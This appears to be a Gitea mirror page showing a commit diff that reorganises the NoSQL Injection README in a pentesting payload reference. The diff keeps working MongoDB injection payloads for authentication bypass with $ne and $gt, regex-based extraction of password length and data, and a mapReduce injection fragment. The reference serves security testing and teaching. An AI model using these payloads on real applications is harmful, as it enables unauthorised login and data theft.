gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-06 04:40:58 -08:00
Code Issues Packages Projects Releases Wiki Activity

MS14-068 + /etc/security/opasswd

Browse Source
This commit is contained in:
Swissky
2019-06-29 17:55:13 +02:00
parent 3b85f1b6fc
commit 144b3827ab
7 changed files with 108 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files

29
NoSQL Injection/README.md
View File

@@ -1,9 +1,28 @@
# NoSQL injection
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
## Summary
* [Tools](#tools)
* [Exploit](exploits)
* [Authentication Bypass](#authentication-bypass)
* [Extract length information](#extract-length-information)
* [Extract data information](#extract-data-information)
* [Blind NoSQL](#blind-nosql)
* [POST with JSON body](#post-with-json-body)
* [GET](#get)
* [MongoDB Payloads](#mongodb-payloads)
* [References](#references)
## Tools
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
## Exploit
### Authentication Bypass
Basic authentication bypass using not equal ($ne) or greater ($gt)
```json
@@ -17,14 +36,14 @@ in JSON
{"username": {"$gt":""}, "password": {"$gt":""}}
```
Extract length information
### Extract length information
```json
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```
Extract data information
### Extract data information
```json
in URL
@@ -124,5 +143,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)